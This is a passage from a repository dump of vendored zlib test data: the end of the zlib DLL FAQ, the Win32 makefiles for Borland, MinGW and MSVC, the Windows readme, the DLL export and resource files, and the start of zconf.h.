If your application requires dynamic linking, you may proceed as explained in the answer to Question 14. 14. I need to link my own DLL build to a CRT different than MSVCRT.DLL. What can I do? - Feel free to rebuild the DLL from the zlib sources, and link it the way you want. You should, however, clearly state that your build is unofficial. You should give it a different file name, and/or install it in a private directory that can be accessed by your application only, and is not visible to the others (i.e. it's neither in the PATH, nor in the SYSTEM or SYSTEM32 directories). Otherwise, your build may clash with applications that link to the official build. For example, in Cygwin, zlib is linked to the Cygwin runtime CYGWIN1.DLL, and it is distributed under the name CYGZ.DLL. 15. May I include additional pieces of code that I find useful, link them in ZLIB1.DLL, and export them? - No. A legitimate build of ZLIB1.DLL must not include code that does not originate from the official zlib source code. But you can make your own private DLL build, under a different file name, as suggested in the previous answer. For example, zlib is a part of the VCL library, distributed with Borland Delphi and C++ Builder. The DLL build of VCL is a redistributable file, named VCLxx.DLL. 16. May I remove some functionality out of ZLIB1.DLL, by enabling macros like NO_GZCOMPRESS or NO_GZIP at compile time? - No. A legitimate build of ZLIB1.DLL must provide the complete zlib functionality, as implemented in the official zlib source code. But you can make your own private DLL build, under a different file name, as suggested in the previous answer. 17. I made my own ZLIB1.DLL build. Can I test it for compliance? - We prefer that you download the official DLL from the zlib web site. If you need something peculiar from this DLL, you can send your suggestion to the zlib mailing list. 
However, in case you do rebuild the DLL yourself, you can run it with the test programs found in the DLL distribution. Running these test programs is not a guarantee of compliance, but a failure can imply a detected problem. ** This document is written and maintained by Cosmin Truta ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/Makefile.bor ================================================ # Makefile for zlib # Borland C++ for Win32 # # Usage: # make -f win32/Makefile.bor # ------------ Borland C++ ------------ # Optional nonstandard preprocessor flags (e.g. -DMAX_MEM_LEVEL=7) # should be added to the environment via "set LOCAL_ZLIB=-DFOO" or # added to the declaration of LOC here: LOC = $(LOCAL_ZLIB) CC = bcc32 AS = bcc32 LD = bcc32 AR = tlib CFLAGS = -a -d -k- -O2 $(LOC) ASFLAGS = $(LOC) LDFLAGS = $(LOC) # variables ZLIB_LIB = zlib.lib OBJ1 = adler32.obj compress.obj crc32.obj deflate.obj gzclose.obj gzlib.obj gzread.obj OBJ2 = gzwrite.obj infback.obj inffast.obj inflate.obj inftrees.obj trees.obj uncompr.obj zutil.obj #OBJA = OBJP1 = +adler32.obj+compress.obj+crc32.obj+deflate.obj+gzclose.obj+gzlib.obj+gzread.obj OBJP2 = +gzwrite.obj+infback.obj+inffast.obj+inflate.obj+inftrees.obj+trees.obj+uncompr.obj+zutil.obj #OBJPA= # targets all: $(ZLIB_LIB) example.exe minigzip.exe .c.obj: $(CC) -c $(CFLAGS) $< .asm.obj: $(AS) -c $(ASFLAGS) $< adler32.obj: adler32.c zlib.h zconf.h compress.obj: compress.c zlib.h zconf.h crc32.obj: crc32.c zlib.h zconf.h crc32.h deflate.obj: deflate.c deflate.h zutil.h zlib.h zconf.h gzclose.obj: gzclose.c zlib.h zconf.h gzguts.h gzlib.obj: gzlib.c zlib.h zconf.h gzguts.h gzread.obj: gzread.c zlib.h zconf.h gzguts.h gzwrite.obj: gzwrite.c zlib.h zconf.h gzguts.h infback.obj: infback.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ inffast.h inffixed.h inffast.obj: inffast.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ inffast.h inflate.obj: inflate.c zutil.h 
zlib.h zconf.h inftrees.h inflate.h \ inffast.h inffixed.h inftrees.obj: inftrees.c zutil.h zlib.h zconf.h inftrees.h trees.obj: trees.c zutil.h zlib.h zconf.h deflate.h trees.h uncompr.obj: uncompr.c zlib.h zconf.h zutil.obj: zutil.c zutil.h zlib.h zconf.h example.obj: test/example.c zlib.h zconf.h minigzip.obj: test/minigzip.c zlib.h zconf.h # For the sake of the old Borland make, # the command line is cut to fit in the MS-DOS 128 byte limit: $(ZLIB_LIB): $(OBJ1) $(OBJ2) $(OBJA) -del $(ZLIB_LIB) $(AR) $(ZLIB_LIB) $(OBJP1) $(AR) $(ZLIB_LIB) $(OBJP2) $(AR) $(ZLIB_LIB) $(OBJPA) # testing test: example.exe minigzip.exe example echo hello world | minigzip | minigzip -d example.exe: example.obj $(ZLIB_LIB) $(LD) $(LDFLAGS) example.obj $(ZLIB_LIB) minigzip.exe: minigzip.obj $(ZLIB_LIB) $(LD) $(LDFLAGS) minigzip.obj $(ZLIB_LIB) # cleanup clean: -del $(ZLIB_LIB) -del *.obj -del *.exe -del *.tds -del zlib.bak -del foo.gz ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/Makefile.gcc ================================================ # Makefile for zlib, derived from Makefile.dj2. # Modified for mingw32 by C. Spieler, 6/16/98. # Updated for zlib 1.2.x by Christian Spieler and Cosmin Truta, Mar-2003. # Last updated: Mar 2012. # Tested under Cygwin and MinGW. # Copyright (C) 1995-2003 Jean-loup Gailly. # For conditions of distribution and use, see copyright notice in zlib.h # To compile, or to compile and test, type from the top level zlib directory: # # make -fwin32/Makefile.gcc; make test testdll -fwin32/Makefile.gcc # # To install libz.a, zconf.h and zlib.h in the system directories, type: # # make install -fwin32/Makefile.gcc # # BINARY_PATH, INCLUDE_PATH and LIBRARY_PATH must be set. # # To install the shared lib, append SHARED_MODE=1 to the make command : # # make install -fwin32/Makefile.gcc SHARED_MODE=1 # Note: # If the platform is *not* MinGW (e.g. 
it is Cygwin or UWIN), # the DLL name should be changed from "zlib1.dll". STATICLIB = libz.a SHAREDLIB = zlib1.dll IMPLIB = libz.dll.a # # Set to 1 if shared object needs to be installed # SHARED_MODE=0 #LOC = -DZLIB_DEBUG -g PREFIX = CC = $(PREFIX)gcc CFLAGS = $(LOC) -O3 -Wall AS = $(CC) ASFLAGS = $(LOC) -Wall LD = $(CC) LDFLAGS = $(LOC) AR = $(PREFIX)ar ARFLAGS = rcs RC = $(PREFIX)windres RCFLAGS = --define GCC_WINDRES STRIP = $(PREFIX)strip CP = cp -fp # If GNU install is available, replace $(CP) with install. INSTALL = $(CP) RM = rm -f prefix ?= /usr/local exec_prefix = $(prefix) OBJS = adler32.o compress.o crc32.o deflate.o gzclose.o gzlib.o gzread.o \ gzwrite.o infback.o inffast.o inflate.o inftrees.o trees.o uncompr.o zutil.o OBJA = all: $(STATICLIB) $(SHAREDLIB) $(IMPLIB) example.exe minigzip.exe example_d.exe minigzip_d.exe test: example.exe minigzip.exe ./example echo hello world | ./minigzip | ./minigzip -d testdll: example_d.exe minigzip_d.exe ./example_d echo hello world | ./minigzip_d | ./minigzip_d -d .c.o: $(CC) $(CFLAGS) -c -o $@ $< .S.o: $(AS) $(ASFLAGS) -c -o $@ $< $(STATICLIB): $(OBJS) $(OBJA) $(AR) $(ARFLAGS) $@ $(OBJS) $(OBJA) $(IMPLIB): $(SHAREDLIB) $(SHAREDLIB): win32/zlib.def $(OBJS) $(OBJA) zlibrc.o $(CC) -shared -Wl,--out-implib,$(IMPLIB) $(LDFLAGS) \ -o $@ win32/zlib.def $(OBJS) $(OBJA) zlibrc.o $(STRIP) $@ example.exe: example.o $(STATICLIB) $(LD) $(LDFLAGS) -o $@ example.o $(STATICLIB) $(STRIP) $@ minigzip.exe: minigzip.o $(STATICLIB) $(LD) $(LDFLAGS) -o $@ minigzip.o $(STATICLIB) $(STRIP) $@ example_d.exe: example.o $(IMPLIB) $(LD) $(LDFLAGS) -o $@ example.o $(IMPLIB) $(STRIP) $@ minigzip_d.exe: minigzip.o $(IMPLIB) $(LD) $(LDFLAGS) -o $@ minigzip.o $(IMPLIB) $(STRIP) $@ example.o: test/example.c zlib.h zconf.h $(CC) $(CFLAGS) -I. -c -o $@ test/example.c minigzip.o: test/minigzip.c zlib.h zconf.h $(CC) $(CFLAGS) -I. 
-c -o $@ test/minigzip.c zlibrc.o: win32/zlib1.rc $(RC) $(RCFLAGS) -o $@ win32/zlib1.rc .PHONY: install uninstall clean install: zlib.h zconf.h $(STATICLIB) $(IMPLIB) @if test -z "$(DESTDIR)$(INCLUDE_PATH)" -o -z "$(DESTDIR)$(LIBRARY_PATH)" -o -z "$(DESTDIR)$(BINARY_PATH)"; then \ echo INCLUDE_PATH, LIBRARY_PATH, and BINARY_PATH must be specified; \ exit 1; \ fi -@mkdir -p '$(DESTDIR)$(INCLUDE_PATH)' -@mkdir -p '$(DESTDIR)$(LIBRARY_PATH)' '$(DESTDIR)$(LIBRARY_PATH)'/pkgconfig -if [ "$(SHARED_MODE)" = "1" ]; then \ mkdir -p '$(DESTDIR)$(BINARY_PATH)'; \ $(INSTALL) $(SHAREDLIB) '$(DESTDIR)$(BINARY_PATH)'; \ $(INSTALL) $(IMPLIB) '$(DESTDIR)$(LIBRARY_PATH)'; \ fi -$(INSTALL) zlib.h '$(DESTDIR)$(INCLUDE_PATH)' -$(INSTALL) zconf.h '$(DESTDIR)$(INCLUDE_PATH)' -$(INSTALL) $(STATICLIB) '$(DESTDIR)$(LIBRARY_PATH)' sed \ -e 's|@prefix@|${prefix}|g' \ -e 's|@exec_prefix@|${exec_prefix}|g' \ -e 's|@libdir@|$(LIBRARY_PATH)|g' \ -e 's|@sharedlibdir@|$(LIBRARY_PATH)|g' \ -e 's|@includedir@|$(INCLUDE_PATH)|g' \ -e 's|@VERSION@|'`sed -n -e '/VERSION "/s/.*"\(.*\)".*/\1/p' zlib.h`'|g' \ zlib.pc.in > '$(DESTDIR)$(LIBRARY_PATH)'/pkgconfig/zlib.pc uninstall: -if [ "$(SHARED_MODE)" = "1" ]; then \ $(RM) '$(DESTDIR)$(BINARY_PATH)'/$(SHAREDLIB); \ $(RM) '$(DESTDIR)$(LIBRARY_PATH)'/$(IMPLIB); \ fi -$(RM) '$(DESTDIR)$(INCLUDE_PATH)'/zlib.h -$(RM) '$(DESTDIR)$(INCLUDE_PATH)'/zconf.h -$(RM) '$(DESTDIR)$(LIBRARY_PATH)'/$(STATICLIB) clean: -$(RM) $(STATICLIB) -$(RM) $(SHAREDLIB) -$(RM) $(IMPLIB) -$(RM) *.o -$(RM) *.exe -$(RM) foo.gz adler32.o: zlib.h zconf.h compress.o: zlib.h zconf.h crc32.o: crc32.h zlib.h zconf.h deflate.o: deflate.h zutil.h zlib.h zconf.h gzclose.o: zlib.h zconf.h gzguts.h gzlib.o: zlib.h zconf.h gzguts.h gzread.o: zlib.h zconf.h gzguts.h gzwrite.o: zlib.h zconf.h gzguts.h inffast.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h inflate.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h infback.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h 
inftrees.o: zutil.h zlib.h zconf.h inftrees.h trees.o: deflate.h zutil.h zlib.h zconf.h trees.h uncompr.o: zlib.h zconf.h zutil.o: zutil.h zlib.h zconf.h ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/Makefile.msc ================================================ # Makefile for zlib using Microsoft (Visual) C # zlib is copyright (C) 1995-2017 Jean-loup Gailly and Mark Adler # # Usage: # nmake -f win32/Makefile.msc (standard build) # nmake -f win32/Makefile.msc LOC=-DFOO (nonstandard build) # The toplevel directory of the source tree. # TOP = . # optional build flags LOC = # variables STATICLIB = zlib.lib SHAREDLIB = zlib1.dll IMPLIB = zdll.lib CC = cl AS = ml LD = link AR = lib RC = rc CFLAGS = -nologo -MD -W3 -O2 -Oy- -Zi -Fd"zlib" $(LOC) WFLAGS = -D_CRT_SECURE_NO_DEPRECATE -D_CRT_NONSTDC_NO_DEPRECATE ASFLAGS = -coff -Zi $(LOC) LDFLAGS = -nologo -debug -incremental:no -opt:ref ARFLAGS = -nologo RCFLAGS = /dWIN32 /r OBJS = adler32.obj compress.obj crc32.obj deflate.obj gzclose.obj gzlib.obj gzread.obj \ gzwrite.obj infback.obj inflate.obj inftrees.obj inffast.obj trees.obj uncompr.obj zutil.obj OBJA = # targets all: $(STATICLIB) $(SHAREDLIB) $(IMPLIB) \ example.exe minigzip.exe example_d.exe minigzip_d.exe $(STATICLIB): $(OBJS) $(OBJA) $(AR) $(ARFLAGS) -out:$@ $(OBJS) $(OBJA) $(IMPLIB): $(SHAREDLIB) $(SHAREDLIB): $(TOP)/win32/zlib.def $(OBJS) $(OBJA) zlib1.res $(LD) $(LDFLAGS) -def:$(TOP)/win32/zlib.def -dll -implib:$(IMPLIB) \ -out:$@ -base:0x5A4C0000 $(OBJS) $(OBJA) zlib1.res if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;2 example.exe: example.obj $(STATICLIB) $(LD) $(LDFLAGS) example.obj $(STATICLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 minigzip.exe: minigzip.obj $(STATICLIB) $(LD) $(LDFLAGS) minigzip.obj $(STATICLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 example_d.exe: 
example.obj $(IMPLIB) $(LD) $(LDFLAGS) -out:$@ example.obj $(IMPLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 minigzip_d.exe: minigzip.obj $(IMPLIB) $(LD) $(LDFLAGS) -out:$@ minigzip.obj $(IMPLIB) if exist $@.manifest \ mt -nologo -manifest $@.manifest -outputresource:$@;1 {$(TOP)}.c.obj: $(CC) -c $(WFLAGS) $(CFLAGS) $< {$(TOP)/test}.c.obj: $(CC) -c -I$(TOP) $(WFLAGS) $(CFLAGS) $< {$(TOP)/contrib/masmx64}.c.obj: $(CC) -c $(WFLAGS) $(CFLAGS) $< {$(TOP)/contrib/masmx64}.asm.obj: $(AS) -c $(ASFLAGS) $< {$(TOP)/contrib/masmx86}.asm.obj: $(AS) -c $(ASFLAGS) $< adler32.obj: $(TOP)/adler32.c $(TOP)/zlib.h $(TOP)/zconf.h compress.obj: $(TOP)/compress.c $(TOP)/zlib.h $(TOP)/zconf.h crc32.obj: $(TOP)/crc32.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/crc32.h deflate.obj: $(TOP)/deflate.c $(TOP)/deflate.h $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h gzclose.obj: $(TOP)/gzclose.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h gzlib.obj: $(TOP)/gzlib.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h gzread.obj: $(TOP)/gzread.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h gzwrite.obj: $(TOP)/gzwrite.c $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/gzguts.h infback.obj: $(TOP)/infback.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h $(TOP)/inflate.h \ $(TOP)/inffast.h $(TOP)/inffixed.h inffast.obj: $(TOP)/inffast.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h $(TOP)/inflate.h \ $(TOP)/inffast.h inflate.obj: $(TOP)/inflate.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h $(TOP)/inflate.h \ $(TOP)/inffast.h $(TOP)/inffixed.h inftrees.obj: $(TOP)/inftrees.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/inftrees.h trees.obj: $(TOP)/trees.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h $(TOP)/deflate.h $(TOP)/trees.h uncompr.obj: $(TOP)/uncompr.c $(TOP)/zlib.h $(TOP)/zconf.h zutil.obj: $(TOP)/zutil.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h gvmat64.obj: $(TOP)/contrib\masmx64\gvmat64.asm inffasx64.obj: 
$(TOP)/contrib\masmx64\inffasx64.asm inffas8664.obj: $(TOP)/contrib\masmx64\inffas8664.c $(TOP)/zutil.h $(TOP)/zlib.h $(TOP)/zconf.h \ $(TOP)/inftrees.h $(TOP)/inflate.h $(TOP)/inffast.h inffas32.obj: $(TOP)/contrib\masmx86\inffas32.asm match686.obj: $(TOP)/contrib\masmx86\match686.asm example.obj: $(TOP)/test/example.c $(TOP)/zlib.h $(TOP)/zconf.h minigzip.obj: $(TOP)/test/minigzip.c $(TOP)/zlib.h $(TOP)/zconf.h zlib1.res: $(TOP)/win32/zlib1.rc $(RC) $(RCFLAGS) /fo$@ $(TOP)/win32/zlib1.rc # testing test: example.exe minigzip.exe example echo hello world | minigzip | minigzip -d testdll: example_d.exe minigzip_d.exe example_d echo hello world | minigzip_d | minigzip_d -d # cleanup clean: -del $(STATICLIB) -del $(SHAREDLIB) -del $(IMPLIB) -del *.obj -del *.res -del *.exp -del *.exe -del *.pdb -del *.manifest -del foo.gz ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/README-WIN32.txt ================================================ ZLIB DATA COMPRESSION LIBRARY zlib 1.3.0 is a general purpose data compression library. All the code is thread safe. The data format used by the zlib library is described by RFCs (Request for Comments) 1950 to 1952 in the files http://www.ietf.org/rfc/rfc1950.txt (zlib format), rfc1951.txt (deflate format) and rfc1952.txt (gzip format). All functions of the compression library are documented in the file zlib.h (volunteer to write man pages welcome, contact zlib@gzip.org). Two compiled examples are distributed in this package, example and minigzip. The example_d and minigzip_d flavors validate that the zlib1.dll file is working correctly. Questions about zlib should be sent to <zlib@gzip.org>. The zlib home page is http://zlib.net/ . Before reporting a problem, please check this site to verify that you have the latest version of zlib; otherwise get the latest version and check whether the problem still exists or not. 
PLEASE read DLL_FAQ.txt, and the zlib FAQ http://zlib.net/zlib_faq.html before asking for help. Manifest: The package zlib-1.3.0-win32-x86.zip will contain the following files: README-WIN32.txt This document ChangeLog Changes since previous zlib packages DLL_FAQ.txt Frequently asked questions about zlib1.dll zlib.3.pdf Documentation of this library in Adobe Acrobat format example.exe A statically-bound example (using zlib.lib, not the dll) example.pdb Symbolic information for debugging example.exe example_d.exe A zlib1.dll bound example (using zdll.lib) example_d.pdb Symbolic information for debugging example_d.exe minigzip.exe A statically-bound test program (using zlib.lib, not the dll) minigzip.pdb Symbolic information for debugging minigzip.exe minigzip_d.exe A zlib1.dll bound test program (using zdll.lib) minigzip_d.pdb Symbolic information for debugging minigzip_d.exe zlib.h Install these files into the compilers' INCLUDE path to zconf.h compile programs which use zlib.lib or zdll.lib zdll.lib Install these files into the compilers' LIB path if linking zdll.exp a compiled program to the zlib1.dll binary zlib.lib Install these files into the compilers' LIB path to link zlib zlib.pdb into compiled programs, without zlib1.dll runtime dependency (zlib.pdb provides debugging info to the compile time linker) zlib1.dll Install this binary shared library into the system PATH, or the program's runtime directory (where the .exe resides) zlib1.pdb Install in the same directory as zlib1.dll, in order to debug an application crash using WinDbg or similar tools. All .pdb files above are entirely optional, but are very useful to a developer attempting to diagnose program misbehavior or a crash. Many additional important files for developers can be found in the zlib127.zip source package available from http://zlib.net/ - review that package's README file for details. Acknowledgments: The deflate format used by zlib was defined by Phil Katz. 
The deflate and zlib specifications were written by L. Peter Deutsch. Thanks to all the people who reported problems and suggested various improvements in zlib; they are too numerous to cite here. Copyright notice: (C) 1995-2017 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu If you use the zlib library in a product, we would appreciate *not* receiving lengthy legal documents to sign. The sources are provided for free but without warranty of any kind. The library has been entirely written by Jean-loup Gailly and Mark Adler; it does not include third-party code. If you redistribute modified sources, we would appreciate that you include in the file ChangeLog history information documenting your changes. Please read the FAQ for more information on the distribution of modified source versions. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/VisualC.txt ================================================ To build zlib using the Microsoft Visual C++ environment, use the appropriate project from the contrib/vstudio/ directory. 
================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/zlib.def ================================================ ; zlib data compression library EXPORTS ; basic functions zlibVersion deflate deflateEnd inflate inflateEnd ; advanced functions deflateSetDictionary deflateGetDictionary deflateCopy deflateReset deflateParams deflateTune deflateBound deflatePending deflatePrime deflateSetHeader inflateSetDictionary inflateGetDictionary inflateSync inflateCopy inflateReset inflateReset2 inflatePrime inflateMark inflateGetHeader inflateBack inflateBackEnd zlibCompileFlags ; utility functions compress compress2 compressBound uncompress uncompress2 gzopen gzdopen gzbuffer gzsetparams gzread gzfread gzwrite gzfwrite gzprintf gzvprintf gzputs gzgets gzputc gzgetc gzungetc gzflush gzseek gzrewind gztell gzoffset gzeof gzdirect gzclose gzclose_r gzclose_w gzerror gzclearerr ; large file functions gzopen64 gzseek64 gztell64 gzoffset64 adler32_combine64 crc32_combine64 crc32_combine_gen64 ; checksum functions adler32 adler32_z crc32 crc32_z adler32_combine crc32_combine crc32_combine_gen crc32_combine_op ; various hacks, don't look :) deflateInit_ deflateInit2_ inflateInit_ inflateInit2_ inflateBackInit_ gzgetc_ zError inflateSyncPoint get_crc_table inflateUndermine inflateValidate inflateCodesUsed inflateResetKeep deflateResetKeep gzopen_w ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/win32/zlib1.rc ================================================ #include #include "../zlib.h" #ifdef GCC_WINDRES VS_VERSION_INFO VERSIONINFO #else VS_VERSION_INFO VERSIONINFO MOVEABLE IMPURE LOADONCALL DISCARDABLE #endif FILEVERSION ZLIB_VER_MAJOR,ZLIB_VER_MINOR,ZLIB_VER_REVISION,0 PRODUCTVERSION ZLIB_VER_MAJOR,ZLIB_VER_MINOR,ZLIB_VER_REVISION,0 FILEFLAGSMASK VS_FFI_FILEFLAGSMASK #ifdef _DEBUG FILEFLAGS 1 #else FILEFLAGS 0 #endif FILEOS 
VOS__WINDOWS32 FILETYPE VFT_DLL FILESUBTYPE 0 // not used BEGIN BLOCK "StringFileInfo" BEGIN BLOCK "040904E4" //language ID = U.S. English, char set = Windows, Multilingual BEGIN VALUE "FileDescription", "zlib data compression library\0" VALUE "FileVersion", ZLIB_VERSION "\0" VALUE "InternalName", "zlib1.dll\0" VALUE "LegalCopyright", "(C) 1995-2022 Jean-loup Gailly & Mark Adler\0" VALUE "OriginalFilename", "zlib1.dll\0" VALUE "ProductName", "zlib\0" VALUE "ProductVersion", ZLIB_VERSION "\0" VALUE "Comments", "For more information visit http://www.zlib.net/\0" END END BLOCK "VarFileInfo" BEGIN VALUE "Translation", 0x0409, 1252 END END ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zconf.h ================================================ /* zconf.h -- configuration of the zlib compression library * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #ifndef ZCONF_H #define ZCONF_H /* * If you *really* need a unique prefix for all types and library functions, * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it. * Even better than compiling with -DZ_PREFIX would be to use configure to set * this permanently in zconf.h using "./configure --zprefix". 
*/ #ifdef Z_PREFIX /* may be set to #if 1 by ./configure */ # define Z_PREFIX_SET /* all linked symbols and init macros */ # define _dist_code z__dist_code # define _length_code z__length_code # define _tr_align z__tr_align # define _tr_flush_bits z__tr_flush_bits # define _tr_flush_block z__tr_flush_block # define _tr_init z__tr_init # define _tr_stored_block z__tr_stored_block # define _tr_tally z__tr_tally # define adler32 z_adler32 # define adler32_combine z_adler32_combine # define adler32_combine64 z_adler32_combine64 # define adler32_z z_adler32_z # ifndef Z_SOLO # define compress z_compress # define compress2 z_compress2 # define compressBound z_compressBound # endif # define crc32 z_crc32 # define crc32_combine z_crc32_combine # define crc32_combine64 z_crc32_combine64 # define crc32_combine_gen z_crc32_combine_gen # define crc32_combine_gen64 z_crc32_combine_gen64 # define crc32_combine_op z_crc32_combine_op # define crc32_z z_crc32_z # define deflate z_deflate # define deflateBound z_deflateBound # define deflateCopy z_deflateCopy # define deflateEnd z_deflateEnd # define deflateGetDictionary z_deflateGetDictionary # define deflateInit z_deflateInit # define deflateInit2 z_deflateInit2 # define deflateInit2_ z_deflateInit2_ # define deflateInit_ z_deflateInit_ # define deflateParams z_deflateParams # define deflatePending z_deflatePending # define deflatePrime z_deflatePrime # define deflateReset z_deflateReset # define deflateResetKeep z_deflateResetKeep # define deflateSetDictionary z_deflateSetDictionary # define deflateSetHeader z_deflateSetHeader # define deflateTune z_deflateTune # define deflate_copyright z_deflate_copyright # define get_crc_table z_get_crc_table # ifndef Z_SOLO # define gz_error z_gz_error # define gz_intmax z_gz_intmax # define gz_strwinerror z_gz_strwinerror # define gzbuffer z_gzbuffer # define gzclearerr z_gzclearerr # define gzclose z_gzclose # define gzclose_r z_gzclose_r # define gzclose_w z_gzclose_w # define gzdirect 
z_gzdirect # define gzdopen z_gzdopen # define gzeof z_gzeof # define gzerror z_gzerror # define gzflush z_gzflush # define gzfread z_gzfread # define gzfwrite z_gzfwrite # define gzgetc z_gzgetc # define gzgetc_ z_gzgetc_ # define gzgets z_gzgets # define gzoffset z_gzoffset # define gzoffset64 z_gzoffset64 # define gzopen z_gzopen # define gzopen64 z_gzopen64 # ifdef _WIN32 # define gzopen_w z_gzopen_w # endif # define gzprintf z_gzprintf # define gzputc z_gzputc # define gzputs z_gzputs # define gzread z_gzread # define gzrewind z_gzrewind # define gzseek z_gzseek # define gzseek64 z_gzseek64 # define gzsetparams z_gzsetparams # define gztell z_gztell # define gztell64 z_gztell64 # define gzungetc z_gzungetc # define gzvprintf z_gzvprintf # define gzwrite z_gzwrite # endif # define inflate z_inflate # define inflateBack z_inflateBack # define inflateBackEnd z_inflateBackEnd # define inflateBackInit z_inflateBackInit # define inflateBackInit_ z_inflateBackInit_ # define inflateCodesUsed z_inflateCodesUsed # define inflateCopy z_inflateCopy # define inflateEnd z_inflateEnd # define inflateGetDictionary z_inflateGetDictionary # define inflateGetHeader z_inflateGetHeader # define inflateInit z_inflateInit # define inflateInit2 z_inflateInit2 # define inflateInit2_ z_inflateInit2_ # define inflateInit_ z_inflateInit_ # define inflateMark z_inflateMark # define inflatePrime z_inflatePrime # define inflateReset z_inflateReset # define inflateReset2 z_inflateReset2 # define inflateResetKeep z_inflateResetKeep # define inflateSetDictionary z_inflateSetDictionary # define inflateSync z_inflateSync # define inflateSyncPoint z_inflateSyncPoint # define inflateUndermine z_inflateUndermine # define inflateValidate z_inflateValidate # define inflate_copyright z_inflate_copyright # define inflate_fast z_inflate_fast # define inflate_table z_inflate_table # ifndef Z_SOLO # define uncompress z_uncompress # define uncompress2 z_uncompress2 # endif # define zError z_zError # ifndef 
Z_SOLO # define zcalloc z_zcalloc # define zcfree z_zcfree # endif # define zlibCompileFlags z_zlibCompileFlags # define zlibVersion z_zlibVersion /* all zlib typedefs in zlib.h and zconf.h */ # define Byte z_Byte # define Bytef z_Bytef # define alloc_func z_alloc_func # define charf z_charf # define free_func z_free_func # ifndef Z_SOLO # define gzFile z_gzFile # endif # define gz_header z_gz_header # define gz_headerp z_gz_headerp # define in_func z_in_func # define intf z_intf # define out_func z_out_func # define uInt z_uInt # define uIntf z_uIntf # define uLong z_uLong # define uLongf z_uLongf # define voidp z_voidp # define voidpc z_voidpc # define voidpf z_voidpf /* all zlib structs in zlib.h and zconf.h */ # define gz_header_s z_gz_header_s # define internal_state z_internal_state #endif #if defined(__MSDOS__) && !defined(MSDOS) # define MSDOS #endif #if (defined(OS_2) || defined(__OS2__)) && !defined(OS2) # define OS2 #endif #if defined(_WINDOWS) && !defined(WINDOWS) # define WINDOWS #endif #if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__) # ifndef WIN32 # define WIN32 # endif #endif #if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32) # if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__) # ifndef SYS16BIT # define SYS16BIT # endif # endif #endif /* * Compile with -DMAXSEG_64K if the alloc function cannot allocate more * than 64k bytes at a time (needed on systems with 16-bit int). 
*/ #ifdef SYS16BIT # define MAXSEG_64K #endif #ifdef MSDOS # define UNALIGNED_OK #endif #ifdef __STDC_VERSION__ # ifndef STDC # define STDC # endif # if __STDC_VERSION__ >= 199901L # ifndef STDC99 # define STDC99 # endif # endif #endif #if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus)) # define STDC #endif #if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__)) # define STDC #endif #if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32)) # define STDC #endif #if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__)) # define STDC #endif #if defined(__OS400__) && !defined(STDC) /* iSeries (formerly AS/400). */ # define STDC #endif #ifndef STDC # ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */ # define const /* note: need a more gentle solution here */ # endif #endif #if defined(ZLIB_CONST) && !defined(z_const) # define z_const const #else # define z_const #endif #ifdef Z_SOLO # ifdef _WIN64 typedef unsigned long long z_size_t; # else typedef unsigned long z_size_t; # endif #else # define z_longlong long long # if defined(NO_SIZE_T) typedef unsigned NO_SIZE_T z_size_t; # elif defined(STDC) # include typedef size_t z_size_t; # else typedef unsigned long z_size_t; # endif # undef z_longlong #endif /* Maximum value for memLevel in deflateInit2 */ #ifndef MAX_MEM_LEVEL # ifdef MAXSEG_64K # define MAX_MEM_LEVEL 8 # else # define MAX_MEM_LEVEL 9 # endif #endif /* 